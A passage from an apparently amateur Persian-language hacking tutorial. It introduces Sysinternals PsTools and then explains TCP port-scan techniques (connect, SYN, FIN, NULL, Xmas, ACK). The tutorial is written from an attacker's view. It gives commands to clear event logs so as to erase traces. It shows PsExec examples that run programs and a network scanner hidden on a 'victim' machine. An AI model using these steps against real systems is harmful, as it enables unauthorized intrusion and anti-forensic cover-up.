ﻓﺮﻣﺎن دیﮕﺮ PsSuspendاﺱﺖ و ﺏﺮای ﺕﻌﻠﻴﻖ یﮏ ﻓﺮایﻨﺪ اﺱﺖ و ﻣﺜﻞ ﻗﺒﻠﯽ اﺱﺖ ﺷﮑﻞ ﻧﻮﺷﺘﻦ دﺱﺘﻮر ﺁن و ﺏﺎ ﻧﻮﺷﺘﻦ هﻤﻴﻦ ﻓﺮﻣﺎن ﺏﻌﻼوﻩ ﺱ ﻮیﭻ r ﻓﺮایﻨﺪ را دوﺏﺎرﻩ راﻩ ﻣﯽ اﻧﺪازد. ﺧﻮب ﻓﺮﻣﺎن ﺏﻌﺪی ﻓﺮﻣﺎن PsLogListاﺱﺖ ﮐﻪ دیﮕﻪ ایﻦ زیﺎد ﺕﻮﺽﻴﺢ ﻧﻤﻴﺪهﻢ ﭼﻮن دیﮕﻪ %٩٠ﺏﻪ درد ﻣﺪیﺮهﺎ ﻣﻴﺨﻮرد ﺕﺎ ﻣﺎ هﺎ. ﮐﻼ ایﻦ ﺏﺮای ﮐﻨﺎر ﮔﺬاﺷﺘﻦ Event Log Viewerاﺱﺖ و وﻗﺎیﻊ ﺡﻴﺎﺕﯽ را ﻧﺸﺎن ﻣﺎ ﻣﻴﺪهﺪ .ﺏﺎ ایﻦ دﺱﺘﻮر ﻣﻴﺘﻮاﻧﻴﺪ رد ﭘﺎهﺎ را ﮐﻼ ﭘﺎک ﮐﻨﻴﺪ : C :\> psloglist.exe –c ﮐﻪ ایﻦ ﮐﻼ ﻓﺎیﻞ ﺙﺒﺖ وﻗﺎیﻊ را ﭘﺎک ﻣﻴﮑﻨﺪ ﻣﺤﺘﻮیﺎت ﺁن را.اﻟﺒﺘﻪ ﺏﻪ ﺻﻮرت ریﺰ ﺕﺮ هﻢ ﻣﻴﺸﻮد اﺱﺘﻔﺎدﻩ ﮐﺮد ﻣﺜﻞ دﺱﺘﻮر زیﺮ : C :\> psloglist.exe –c Application ﺧﻮب ایﻦ هﻢ %١٠ﮐﺎر ایﻦ ﻧﺮم اﻓﺰار ﮐﻪ ﺏﺪرد ﻣﺎ ﻣﯽ ﺧﻮرد )ایﻦ دﺱﺘﻮر هﻢ از راﻩ دور ﻣﻴﺘﻮان اﺱﺘﻔﺎدﻩ ﮐﺮد.اﻣﺎ ﺏﻪ ﺷﺮط هﺎ !!(.
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٢٦
اﺏﺰار : PsExec اﺏﺰار ﺏﻌﺪی ﮐﻪ ﻣﻌﺮﻓﯽ ﻣﻴﮑﻨﻢ اﺏﺰار PsExecاﺱﺖ .ایﻦ اﺏﺰار ﮐﺎر ﺏﺮدی ﺕﺮیﻦ اﺏﺰار ایﻦ ﻣﺠﻤﻮﻋﻪ اﺱﺖ ﺏﺪون اﻏﺮاق .ﺏﺎ ایﻦ اﺏﺰار ﺷﻤﺎ ﻣ ﯽ ﺕﻮاﻧﻴ ﺪ یﮏ ﺏﺮﻧﺎﻣﻪ ) ﺏﺒﺨﺸﻴﺪ ! هﺮ ﺏﺮﻧﺎﻣﻪ ایﯽ ( را روی ﺱﻴﺴﺘﻢ ﻗﺮﺏﺎﻧﯽ ﺏﺎﻻ ﭘﺎیﻦ ﺏﮑﻨﻴﺪ ) ﻣﻨﻈﻮر راﻩ ﺏﻴﻨﺪازیﺪ !!( .ﺧﻮب اﮔﺮ ﺏﺮﻧﺎﻣﻪ ﻣﻮرد ﻋﻼﻗﻪ ﻣﻦ ﺁﻧﺠ ﺎ ﻧﺒ ﻮد ﺡﺘ ﯽ اﺟ ﺎزﻩ ﺏ ﺎرﮔﻴﺮی ﺁن ) ( Downloadرا ه ﻢ ﺏ ﻪ ﻣ ﺎ ﻣﻴﺪه ﺪ !!! ﺏ ﺮ ﺧ ﻼف ﺱ ﺎیﺮ اﺏﺰاره ﺎ راﻩ دور هﻤﭽ ﻮن ﻓﺮﻣﺎﻧﻬ ﺎی ﻣﻌ ﺎدل rexecدر ویﻨﺪوز ،در ﻣﻮرد ایﻦ اﺏﺰار ﻧﻴﺎزی ﺏﻪ ﻧﺼﺐ هﻴﭻ ﮔﻮﻧﻪ ﻓﺎیﻞ و یﺎ DLLﺧﺎﺻﯽ ﻧﺪارد) .ﻓﺮﻣﺎن rexecیﮑﯽ از ﻓﺮﻣﺎﻧﻬﺎی ﻣﻬﻢ هﮑﺮهﺎ در ﻟﻴﻨ ﻮﮐﺲ اﺱﺖ ﮐﻪ ﺏﺎ ﺁن ﻣﻴﺘﻮان ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ را " وادار " ﺏﻪ اﺟﺮای ﺏﺮﻧﺎﻣ ﻪ ﻣ ﻮر ﻧﻈ ﺮ ﻣ ﺎ ﮐ ﺮد ،ﺏ ﻪ هﻤ ﻴﻦ ﺧ ﺎﻃﺮ اﺱ ﺖ ﮐ ﻪ در ﭼﻨ ﺪ ﺱ ﻄﺮ ﺏ ﺎﻻ ﮔﻔ ﺘﻢ " ﺡ ﺎل ﺁﻧﻬﺎیﯽ را ﮐﻪ ﺏﺎ داﺷﺘﻦ ﻟﻴﻨﻮﮐﺲ هﯽ ،ﭼﭗ ﻣﻴﺮﻧﺪ راﺱﺖ ﻣﻴﺮﻧﺪ و… ﺏﺮای ﺷﻤﺎ " ﻗﻤﭙﺾ " ﻣﯽ ﺕﺮﮐﺎﻧﺪﻧﺪ را ﺱﺮ ﺟﺎیﺸﺎن ﺏﻨﺸﺎﻧﯽ ﭘﺴﺮم!! ". اﻟﺒﺘ ﻪ زی ﺎد ذوق زدﻩ ﻧ ﺸﻮیﺪ ﭼ ﻮن دﺱﺘﺮﺱ ﯽ ﺏ ﻪ ﻣﻨﺒ ﻊ ﻣ ﺸﺘﺮک ADMIN$و ﻋﺒ ﻮر از ﻣ ﺎﻧﻊ اﺡ ﺮاز هﻮی ﺖ ﺏ ﻪ ﻣﻨﻈ ﻮر اﺟ ﺮای ای ﻦ ﺏﺮﻧﺎﻣ ﻪ از ﺽﺮوریﺎت اﺱﺖ .ایﻦ ﺏﺮﻧﺎﻣﻪ یﮏ ﮐﻤﯽ " هﺎ ﻟﻮ " ﻣﻴﺰﻧﻪ ﭼﻮن هﻤﻴﺸﻪ ﻓﮑﺮ ﻣﻴﮑﻨﺪ ﻣﺎ ﻣﻴﺨﻮاهﻴﻢ از ﺁن ﺏﺮای اﺱﺘﻔﺎدﻩ از راﻩ دور اﺱ ﺘﻔﺎدﻩ ﮐﻨ ﻴﻢ از ای ﻦ رو ﺕﻌﻴ ﻴﻦ ﺁرﮔﻮﻣ ﺎن computer nameدر اﻟﮕ ﻮی ﻋﻤ ﻮﻣﯽ اﺱ ﺘﻔﺎدﻩ از ای ﻦ ﻓﺮﻣ ﺎن اﻣ ﺮی واﺟ ﺐ اﺱ ﺖ .ﺏ ﺎ اﺱ ﺘﻔﺎدﻩ از ﺱ ﻮیﭻ –uو –pﻣﻴﺘ ﻮان ﻧ ﺎم ﮐﺎرﺏﺮی و ﮐﻠﻤﻪ ﻋﺒﻮر را وارد ﮐﺮد .ﻣﺜﺎل: C :\> psexec.exe \\xxx.xxx.xxx.xxx cmd/c dir در اﺱﺘﻔﺎدﻩ از ایﻦ اﺏﺰار ﻣﺴﻴﺮ اﺟﺮای ﻓﺮﻣﺎن ﻣﻮرد ﻧﻈﺮ ﺏﻪ ﻃﻮر ﭘﻴﺶ ﻓﺮض %SYSTEMROOT%\System32اﺱﺖ. ﻣﺜﺎل هﺎی ﺏﻴﺸﺘﺮ : C :\> psexec.exe \\xxx.xxx.xxx.xxx ipconfig/all C :\> psexec.exe \\xxx.xxx.xxx.xxx net use * \\yyy.yyy.yyy.yyy\backups Rch! ve/u: backup C :\> psexec.exe \\xxx.xxx.xxx.xxx c:\cygwin\usr\sbin\sshd اﮔﺮ ﻧﺎم یﺎ ﻣﺴﻴﺮ دارای ﺟﺎی ﺧﺎﻟﯽ ﺏﺎﺷﺪ ﺏﺎیﺪ ﺁن را درون " " ﻗﺮار دهﻴﺪ . اﮔﺮ ﻣﺴﻴﺮ را درﺱﺖ ﺏﻠﺪ ﻧﻴﺴﺘﻴﺪ ﻣﻴﺘﻮاﻧﻴﺪ ﺏﺎ اﺽﺎﻓﻪ ﮐﺮدن ﺱﻮیﭻ –cو یﺎ –fﻣﺸﮑﻞ ﺧﻮد را ﺡ ﻞ ﮐﻨﻴ ﺪ .ﺏ ﺎ ای ﻦ روش اول ﺏﺮﻧﺎﻣ ﻪ ی ﮏ ﮐﭙ ﯽ از ﻧ ﺴﺨﻪ ﺧﻮد در ﺁﻧﺠﺎ ) ( %SYSTEMROOT%\System32درﺱﺖ ﻣﯽ ﮐﻨﺪ .ﺱﻮیﭻ –fدر ﺻﻮرت وﺟﺪ ﺏﺮﻧﺎﻣﻪ ﻣﻮرد ﻧﻈ ﺮ در ﺁﻧﺠ ﺎ ﻧ ﺴﺨﻪ ﺁن را ﺏ ﺎ ﻧﺴﺨﻪ ارﺱﺎﻟﯽ ﻋﻮض ﻣﯽ ﮐﻨﺪ. یﮏ ﻣﺜﺎل ﻣﻴﺰﻧﻢ راﻩ ﮐﺎر ﺁن دﺱﺖ ﺧﻮدﺕﺎن ﺏﻴﺎد .در ﻣﺜﺎل زیﺮ ﭘﺲ از ﺏﺎر ﮔﺬاری ﺏﺮﻧﺎﻣﻪ ای ﺏ ﺎ ﻋﻨ ﻮان ) fscanﺏﻌ ﺪا ﺏ ﻪ ﻃ ﻮر ﮐﺎﻣ ﻞ ﺕﻮﺽ ﻴﺢ ﻣﻴ ﺪهﻢ درﺏﺎرﻩ اش ( ﺏﺮ روی ﺱﻴﺴﺘﻢ هﺪف .ﻓﺮایﻨﺪ اﺱﮑﻦ ﭘﻮرت هﺎی ﺱﻴﺴﺘﻤﻬﺎی واﻗﻊ ﺏﺮ روی ﺷﺒﮑﻪ ﮐﻼس Cﻣﻘﺼﺪ را اﻧﺠﺎم ﻣﻴﺪهﺪ. C :\> psexec.exe \\xxx.xxx.xxx.xxx –c fscan.exe q bpl-10001 –o targets.txt 192.168.0.1- 192.168.0.255 ﺏﺎ ایﻦ روش ﻣﻴﺘﻮاﻧﻴﺪ هﺮ ﺏﺮﻧﺎﻣﻪ ) ازﺟﻤﻠﻪ ﺕﻤﺎم ﺏﺮﻧﺎﻣﻪ هﺎی ( Pstoolsرا روی ﻣﺎﺷﻴﻦ ﻃﺮف ﺏﺮیﺰیﺪ و اﺟﺮا ﮐﻨﻴﺪ . ﺱﻮیﭻ Dﺏﺎﻋﺚ ﻣﺨﻔﯽ اﺟﺮا ﺷﺪن ﺏﺮﻧﺎﻣﻪ ﻣﻴﺸﻮد . ﺱﻮیﭻ Sﺏﺮای اﺱﺘﻔﺎدﻩ در ﻗﺎﻟﺐ یﮏ ﺡﺴﺎب ﺱﻴﺴﺘﻤﯽ اﺱﺘﻔﺎدﻩ ﻣﻴﺸﻮد. ﺱﻮیﭻ Iﺏﺎﻋﺚ ﻣﻴﺸﻮد دﺱﺖ یﺎﺏﯽ ﻣﺤﺎورﻩ ای ﺏﻪ ﺱﻴﺴﺘﻢ ﭘﻴﺪا ﮐﻨﻴﻢ .در ﻣﻮرد ﺏﺮﻧﺎﻣﻪ هﺎی ﻣﺜﻞ FTPﮐﻪ ﻧﻴﺎز ﺏﻪ ﮐﻠﻤﻪ ﻋﺒﻮر دارد اﺱﺘﻔﺎدﻩ ﻣﻴﺸﻮد. اﺏﺰار : PsShutdown ﺁﺧﺮیﻦ اﺏﺰار ایﻦ ﻣﺠﻤﻮﻋﻪ اﺏﺰار PsShutdownاﺱﺖ. ﮐ ﺎر ای ﻦ اﺏ ﺰار دﻗﻴﻘ ﺎ ﺷ ﺒﻴﻪ اﺏ ﺰار shutdownدر ﻣﺠﻤﻮﻋ ﻪ windows Resourceاﺱ ﺖ .ای ﻦ اﺏ ﺰار ﻗ ﺎدر اﺱ ﺖ ﺱﻴ ﺴﺘﻤﯽ را ﺧ ﺎﻣﻮش و ی ﺎ از ﺧﺎﻣﻮش ﺷﺪن ﺁن ﺟﻠﻮﮔﻴﺮی ﮐﻨﺪ و یﺎ ﻟﺤﻈﻪ ای یﮏ ﺱﻴﺴﺘﻢ را ﺧﺎﻣﻮش ﮐﻨﺪ و... ﺏ ﺮای ﺧ ﺎﻣﻮش ﮐ ﺮدن ﻧﺎﮔﻬ ﺎﻧﯽ ﻣﺎﺷ ﻴﻦ ه ﺪف از ﺱ ﻮیﭻ –fاﺱ ﺘﻔﺎدﻩ ﻣ ﯽ ﮐﻨ ﻴﻢ .ای ﻦ ﺱ ﻮیﭻ ﻣ ﺴﺎوی ﺏ ﺎ اﺱ ﺘﻔﺎدﻩ ﺕ ﻮام دو ﺱ ﻮیﭻ cو yدر ﻧ ﺮم اﻓ ﺰار shutdownدر ﻣﺠﻤﻮﻋﻪ windows Resourceاﺱﺖ. ﺏﻘﻴﻪ اش دیﮕﻪ ﺕﺎﺏﻠﻮ ﺧﻮدﺕﺎن ﺕﺠﺮﺏﻪ ﮐﻨﻴﺪ !!!. ﺧﻮب ﺕﺎ ﺏﻪ ﺡﺎل اﮐﺜﺮ ﻧﺮم اﻓﺰارهﺎی ﻣﻬﻢ ﺟﻤﻊ ﺁوری اﻃﻼﻋﺎت ﻣﻘﺪﻣﺎﺕﯽ را ﻣﻌﺮﻓﯽ ﮐﺮدم در ایﻦ ﺏﺎب ی ﮏ ﮐ ﺎر دیﮕ ﺮ ه ﻢ اﺱ ﺖ ﮐ ﻪ اﻟﺒﺘ ﻪ ﺧﻴﻠ ﯽ ﻣﻬ ﻢ اﺱﺖ و ﺁن اﺱﮑﻦ ﭘﻮرت هﺎ ﺏﺮای ﺏﺪﺱﺖ ﺁوردن ﻟﻴﺴﺖ ﭘﻮرت هﺎی ﺏ ﺎز و ﺱﺮوی ﺴﻬﺎی ﺁن و ...ﺧ ﻮب اول ﻣ ﻦ ی ﮏ ﻧﻤ ﺎی ﮐﻠ ﯽ در ﺏ ﺎرﻩ اﻧ ﻮاع اﺱ ﮑﻦ ﮐﺮدن ﭘﻮرت هﺎ ﺏﻪ ﺷﻤﺎ ﻣﻴﺪهﻢ ﺕﺎ ﺏﻌﺪ ﺏﺮﺱﻴﻢ ﺱﺮ ﻣﻌﺮﻓﯽ و ﺁﻣﻮزش ﭼﮕﻮﻧﮕﯽ اﺱﺘﻔﺎدﻩ از ﻧﺮم اﻓﺰارهﺎی ﻣﺮﺏﻮﻃﻪ .
ﮔﺎم دوم اﻧﻮاع ﺵﻴﻮﻩ هﺎی ﺟﺴﺘﺠﻮی ﭘﻮرت : -١ﻣﮑﺎﻧﻴﺰم ﭘﻮیﺶ ﻣﻮدﺏﺎﻧﻪ و یﺎ اﺻﻄﻼﺡﺎ ) : ( Polite Scan در ایﻦ ﻣﮑﺎﻧﻴﺰم ﻧﺮم اﻓﺰار ﭘﻮیﺸﮕﺮ ﭘﻮرت ی ﮏ ارﺕﺒ ﺎط ﮐﺎﻣ ﻞ و ﺱ ﻪ ﻣﺮﺡﻠ ﻪ ای TCPﺏ ﺎ ی ﮏ ﺷ ﻤﺎرﻩ ﭘ ﻮرت ﺧ ﺎص ﺏﺮﻗ ﺮار ﻣ ﯽ ﻧﻤﺎی ﺪ .ﺧ ﻮب اﮔ ﺮ ارﺕﺒﺎط وﺻﻞ ﺷﻮد ﭘﺲ ﭘﻮرت ﻣﺮﺏﻮﻃﻪ ﺏﺎز اﺱﺖ ) .ﭘﺲ ﺡﺘﻤﺎ ﺱﺮویﺴﯽ وﺟﺪ داﺷﺘﻪ ﮐﻪ ایﻦ ﭘﻮرت ﺏﺎز ﮐﺮدﻩ (. ﭼﻮن ایﻦ ﻋﻤﻞ ﮐﺎﻣﻼ ﻗﺎﻧﻮﻧﯽ ) از ﻧﻈﺮ ﭘﺮوﺕﮑﻞ ( TCPاﺱﺖ و یﮏ روال ﻃﺒﻴﻌﯽ دارد اﺡﺘﻤﺎل ﺁﻧﮑﻪ ﻣﺎﺷﻴﻦ هﺪف دﭼﺎر اﺧﺘﻼل ﺷﻮد وﺟﻮد ﻧﺪارد .
آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!
ﺻﻔﺤﻪ
٢٧
اﻟﺒﺘﻪ ﺏﻪ دﻻیﻠﯽ اﺱﺘﻔﺎدﻩ از ایﻦ ﺷﻴﻮﻩ اﺡﺘﻤﺎل ﻟﻮ رﻓﺘﻦ ﺷﻤﺎ ﺏﺴﻴﺎر زیﺎد ﻣﻴﺸﻮد و زﻣﺎن زیﺎدی ﺱﺮف ای ﻦ ﺱ ﻪ ﻣﺮﺡﻠ ﻪ دﺱ ﺖ ﺕﮑ ﺎﻧﯽ ﻣﻴ ﺸﻮد ،اﻟﺒﺘ ﻪ ﻧﺘ ﺎیﺞ ﮐﺎﻣﻼ ﻗﺎﺏﻞ اﻃﻤﻴﻨﺎن اﺱﺖ. روﻧﺪ ﮐﺎری ﺏﻪ ﺻﻮرت زیﺮ اﺱﺖ در ﺏﻴﺶ از %٩۵از ﻧﺮم اﻓﺰار هﺎی ﭘﻮیﺸﮕﺮ ﭘﻮرت. • یﮏ ﺏﺴﺘﻪ SYNﺏﻪ ﺱﻤﺖ ﻣﺎﺷﻴﻦ هﺪف ﻓﺮﺱﺘﺎدﻩ ﺷﺪﻩ. • ﻧﺮم اﻓﺰار ﺏﻪ ﻣﺪت ﻣﺸﺨﺼﯽ ﮐﻪ اﻟﺒﺘﻪ ﻣﻌﻤﻮﻻ ﻗﺎﺏﻞ ﺕﻨﻈﻴﻢ اﺱﺖ ﻣﻨﺘﻈﺮ ﺟ ﻮاب SYN-ACKﻣﻴ ﺸﻮد ﺕ ﺎ ﺏﺮﮔ ﺮدد .اﮔ ﺮ ﺟ ﻮاب دریﺎﻓ ﺖ ﺷ ﺪ ﭘﺲ ﭘﻮرت ﺏﺎز ﺏﻮدﻩ در ﻏﻴﺮ ایﻦ ﺻﻮرت " اﺡﺘﻤﺎﻻ " ﻧﻪ %١٠٠ﻣﻴﺸﻮد ﮔﻔﺖ ﮐﻪ ﺏﺴﺘﻪ اﺱﺖ ایﻦ ﭘﻮرت . • اﮔﺮ ﭘﻮرت ﺏﺎز ﺏﺎﺷﺪ ﻣﺮﺡﻠﻪ ﺱﻮم دﺱﺖ ﺕﮑﺎﻧﯽ اﻧﺠﺎم ﻣﯽ ﺷﻮد ﺏﺎ ﻓﺮﺱﺘﺎدن یﮏ ﺏﺴﺘﻪ . ACK • ﺧﻮب ﺡﺎﻻ ﭼﻮن ﭘﻮرت ﺏﺎزﻩ و ﻣﺎ ﺕﺎ ﺡﺎﻻ ایﻦ ﻧﺮم اﻓﺰار هﺮ ﮐﺎری ﮐﺮدﻩ ﺏﺮای ارﺕﺒﺎط ﺏﺎ ﺁن ﻣﺎﺷﻴﻦ ﺏﻮدﻩ وﻟﯽ ﻣﺎ ﻓﻘﻂ ﻣﻴﺨﻮاﺱ ﺘﻴﻢ ﺏﺒﻴﻨ ﻴﻢ ای ﻦ در ﺏﺎزﻩ یﺎ ﻧﻪ ،ﻧﻪ ایﻨﮑﻪ ﺏﻪ هﻢ وﺻﻞ ﺷﻮیﻢ ﭘﺲ ﻧﺮم اﻓﺰار ﺏﺎ ﻓﺮﺱﺘﺎدن یﮏ ﺏﺴﺘﻪ FIN=1ارﺕﺒﺎط ﭘﺎیﺎن ﻣﻴﺪهﺪ. -٢ﭘﻮیﺶ ﻣﺨﻔﻴﺎﻧﻪ ) : ( TCP SYN Scan در ایﻦ ﻣﮑﺎﻧﻴﺰم یﺎ ﺷﻴﻮﻩ دو ﻣﺮﺡﻠﻪ از دﺱﺖ ﺕﮑﺎﻧﯽ اﻧﺠﺎم ﻣﯽ ﺷﻮد و روش اﻣﻦ ﺕﺮی اﺱﺖ ﻧﺴﺒﺖ ﺏﻪ ﺷﻴﻮﻩ ﻗﺒﻠﯽ و اﻟﺒﺘﻪ ﺱﺮﻋﺖ ﺁن ﺏﻴﺸﺘﺮ اﺱﺖ ﻧﺴﺒﺖ ﺏﻪ ﺷﻴﻮﻩ اول دارای ﻣﺮاﺡﻞ زیﺮ اﺱﺖ : • یﮏ ﺏﺴﺘﻪ SYSﺏﺮای هﺪف ﻣﻴﻔﺮﺱﺘﺪ. • زﻣﺎن ﻣﺸﺨﺼﯽ ﺏﺮای ﺟﻮاب ﺻﺒﺮ ﻣﯽ ﮐﻨﺪ ﺕﺎ ﺏﺒﻴﻨﺪ ﺏﺴﺘﻪ SYN-ACKدر ﺟﻮاب ﻣﯽ ﺁیﺪ یﺎ ﻧﻪ .اﮔﺮ ﺟﻮاب ﺁﻣﺪ ﮐﻪ یﻌﻨﯽ ﭘﻮرت ﺏﺎز اﺱﺖ. • ﺏﺎ ﺏﺎز ﮔﺸﺖ ﺟﻮاب ) ( SYN-ACKﻧﺮم اﻓﺰار ﺱﺮیﻌﺎ ﺏﺴﺘﻪ RESETرا ﺏﺮای هﺪف ﻣﻴﻔﺮﺱﺘﺪ و هﻴﭻ ارﺕﺒﺎﻃﯽ ﺏﻪ وﺟﺪ ﻧﻤﯽ ﺁیﺪ . -٣ﭘﻮیﺶ ﺏﻪ روش ﻧﻘﺾ اﺻﻮل ﭘﺮوﺕﮑﻞ . TCP در دو روش ﻗﺒﻠﯽ ﻋﻤﻞ ﭘﻮیﺶ ﺏﺮ ﭘﺎیﻪ ﻓﺮﺱﺘﺎدن یﮏ ﺏﺴﺘﻪ SYSو اﻧﺘﻈ ﺎر ﺏ ﺮای دریﺎﻓ ﺖ ﺏ ﺴﺘﻪ SYN-ACKاﺱ ﺘﻮار ﺏ ﻮد .در ای ﻦ ﺱ ﻪ روش از ﺏﺴﺘﻪ هﺎی اﺱﺘﻔﺎدﻩ ﻣﯽ ﺷﻮد ﮐﻪ در ﺡﺎﻟﺖ ﻋﺎدی هﻴﭻ وﻗﺖ یﮏ دﻓﻌﻪ ﻓﺮﺱﺘﺎدﻩ ﻧﻤﯽ ﺷﻮد. ایﻦ روش ﺱﻪ ﻣﮑﺎﻧﻴﺰم یﺎ ﺷﻴﻮﻩ دارد ﮐﻪ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ. : TCP FIN Scan -٣-١ ﺏﻪ ﻃﻮر ﮐﻠﯽ ﺏﺴﺘﻪ هﺎی TCP FINﺏﺮای ﺧﺎﺕﻤﻪ یﮏ ارﺕﺒﺎط TCPارﺱﺎل ﻣﯽ ﺷﻮد .و هﻤﺎن ﻃﻮر ﮐﻪ " دوﮔﻮﻟﻪ " ﺡﮑﻢ ﻣﻴﮑﻨﺪ یﮏ دﻓﻌ ﻪ ای ﻦ ﺏ ﺴﺘﻪ را ﺏﺮای ﺷﺮوع ارﺕﺒﺎط ﻧﻤﯽ ﻓﺮﺱﺘﻨﺪ .در ایﻦ ﺷﻴﻮﻩ ﺡﮑﻢ دوﮔﻮﻟﻪ را ﺏﺮ ﻋﮑﺲ ﮐﺮدﻩ و ﺕﺎ ﺏﻌﺪ ﺏﻪ ﺏﻴﻨ ﻴﻢ ﭼ ﻪ ﻣﻴ ﺸﻮد .ﻃﺒ ﻖ ﻗﻮاﻋ ﺪ ﭘﺮوﺕﮑ ﻞ اﮔ ﺮ ﭘ ﻮرﺕﯽ ﺏﺎز ﺏﺎﺷﺪ و ایﻦ ﺏﺴﺘﻪ را ﺏﺮایﺶ ﺏﻔﺮﺱﺘﻴﻢ هﻴﭻ ﺟﻮاﺏﯽ ﻧﻤﯽ دهﺪ ﭘﺲ ﻣﺎ اﺡﺘﻤﺎل زیﺎد ﺏﺎ ﻋﺪم دریﺎﻓ ﺖ ﺟ ﻮاب ﭘ ﯽ ﻣﻴﺒ ﺮیﻢ ﭘ ﻮرت ﺏ ﺎز اﺱ ﺖ اﻣ ﺎ اﮔ ﺮ ی ﮏ ﭘﻮرت ﺏﺴﺘﻪ یﮏ هﻤﭽﻴﻦ ﺏﺴﺘﻪ ای ﺏﻔﺮﺱﺘﻴﻢ ﺏﺎیﺪ ﻣﺎﺷﯽ هﺪف ﺏﺮای ﻣﺎ ﺟﻮاب RESETﺏﻔﺮﺱﺘﺪ ﭘﺲ ﻣﺎ ﭘﯽ ﻣﻴﺒﺮیﻢ ایﻦ ﭘﻮرت ﺏﺴﺘﻪ اﺱﺖ . : NULL Scan -٣-٢ ایﻦ هﻢ یﮏ ﻣﮑﺎﻧﻴﺰم ﺏﺮ ﺧﻼف ﺡﮑﻢ دوﮔﻮﻟﻪ اﺱﺖ .ایﻦ ﺏﺎر ﺏﺮﻧﺎﻣﻪ ﻣﻮرد ﻧﻈﺮ ﺏﺪون ﺏﺮﻗﺮاری ارﺕﺒﺎط ﺏﺎ ﻣﺎﺷﻴﻦ هﺪف ی ﮏ دﻓﻌ ﻪ ﺏ ﺮای ﻣﺎﺷ ﻴﻦ ه ﺪف یﮏ ﺏﺴﺘﻪ TCPﺏﺎ ﺷﻤﺎرﻩ ﭘﻮرت ﻣﺸﺨﺺ ﺏﺮای یﮏ ﭘﻮرت ﺧﺎص ارﺱﺎل ﻣﯽ ﮐﻨﺪ .ایﻦ ﺏﺴﺘﻪ دارای ویﮋﮔﯽ هﺎی اﺱ ﺖ ﮐ ﻪ ﺏﻴﺘﻬ ﺎی SYSو FINو ACKﺁن ١ﻧﻴﺴﺖ ﭘﺲ یﮏ ﺏﺴﺘﻪ ﺏﯽ ﻣﻌﻨﯽ اﺱﺖ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﻗﻮاﻧﻴﻦ ﭘﺮوﺕﮑﻞ .وﻗﺘﯽ هﺪف ایﻦ ﺏﺴﺘﻪ در ﭘﻴﺖ ﻣﺎ را ﻣﻴﮕﻴﺮد اﮔﺮ ﭘ ﻮرت ﺏ ﺎز ﺏﺎﺷ ﺪ ﮐ ﻪ ﺏﺴﺘﻪ را ﺡﺬف ﻣﻴﮑﻨﺪ اﮔﺮ ﭘﻮرت ﺏﺴﺘﻪ ﺏﺎﺷﺪ یﮏ ﭘﺎﺱﺦ ) ی ﮏ ﺏ ﺴﺘﻪ ( RESETﺏ ﻪ ﻣ ﺎ ﻣﻴﺪه ﺪ .ﭘ ﺲ ﻣ ﺎ ﻧﺘﻴﺠ ﻪ ﻣﻴﮕﻴ ﺮیﻢ اﮔ ﺮ ﺟ ﻮاب در یﺎﻓ ﺖ ﻧﮑ ﺮدیﻢ ﭘﻮرت ﺏﺎز اﺱﺖ اﮔﺮ دریﺎﻓﺖ ﮐﺮدیﻢ ﭘﻮرت ﺏﺴﺘﻪ اﺱﺖ. : Xmas Tree -٣-٣ در ایﻦ ﻣﮑﺎﻧﻴﺰم ،ﮐﻪ ﮐﺎﻣﻼ ﺏﺮﻋﮑﺲ ﺏﺎﻻ اﺱﺖ از ﻧﻈﺮ ﻗﻮاﻧﻴﻦ ﭘﺮوﺕﮑﻞ ﻣﺎ ی ﮏ ﺏ ﺴﺘﻪ TCPﺏ ﺮای ه ﺪف ﻣﻴﻔﺮﺱ ﺘﻴﻢ ﮐ ﻪ ﻓﻴﻠ ﺪ ه ﺎی FINو URGو PUSHرا ﺏﺎ ١ﭘﺮ ﮐﺮدﻩ ایﻢ ایﻦ هﻢ از ﻧﻈﺮ ﭘﺮوﺕﮑﻞ اﻟﺒﺘﻪ ﻗﻮاﻧﻴﻦ ﺁن یﮏ ﺏﺴﺘﻪ ﺏﯽ ﻣﻌﻨﯽ اﺱﺖ ﭘﺲ ﭘﻮرت ﺏﺎز ﺏ ﺴﺘﻪ را ﺡ ﺬف ﻣﻴﮑﻨ ﺪ و ﭘ ﻮرت ﺏ ﺴﺘﻪ یﮏ ﺟﻮاب RESETﺏﻪ ﻣﺎ ﻣﻴﺪهﺪ . یﮏ ﻧﮑﺘﻪ ﺧﻴﻠﯽ ﻣﻬﻢ : ﺧﻮب ایﻦ روش هﺎ ) ﻧﻘﺾ اﺻﻮل ﭘﺮوﺕﮑﻞ ( ﺷﺎیﺪ ﺧﻴﻠﯽ ﺟﺎﻟﺐ ﺏﺎﺷﺪ اﻣﺎ ﻓﻘﻂ ﺏﺮای ﺱﻴﺴﺘﻢ هﺎی ﻏﻴﺮ ویﻨﺪوز ﮐﺎرایﯽ دارد ﭼﻮن وﻗﺘ ﯽ ﺏ ﺮای ویﻨ ﺪوز هﺎ از ایﻦ ﺏﺴﺘﻪ هﺎ ﺏﻔﺮﺱﺘﻴﺪ در هﺮ ﺡﺎﻟﺘﯽ ﺟﻮاب RESETﺏﺮای ﻣﺎ ﺡﻮاﻟﻪ ﻣﯽ ﮐﻨﺪ . -۴ﭘﻮیﺶ ﺏﻪ روش : TCP ACK Scan ایﻦ ﻣﮑﺎﻧﻴﺰم یﺎ ﺷﻴﻮﻩ ﺕﻘﺮیﺒﺎ ﺷﺒﻴﻪ ﺱﻪ ﻣﮑﺎﻧﻴﺰم ﺏﺎﻻ اﺱﺖ ﺏﺎ ایﻦ ﺕﻔﺎوت ﮐﻪ یﮏ دﻓﻌﻪ یﮏ ﺏﺴﺘﻪ ACKﺏﺮای هﺪف ﻓﺮﺱﺘﺎدﻩ ﻣﻴﺸﻮد ) ایﻦ ﺏ ﺴﺘﻪ ﻣﻌﻤ ﻮﻻ در ﺟﻮاب ﺏﺴﺘﻪ SYSﻓﺮﺱ ﺘﺎدﻩ ﻣ ﯽ ﺷ ﻮد ( ﺧ ﻮب ﺏ ﻪ ای ﻦ 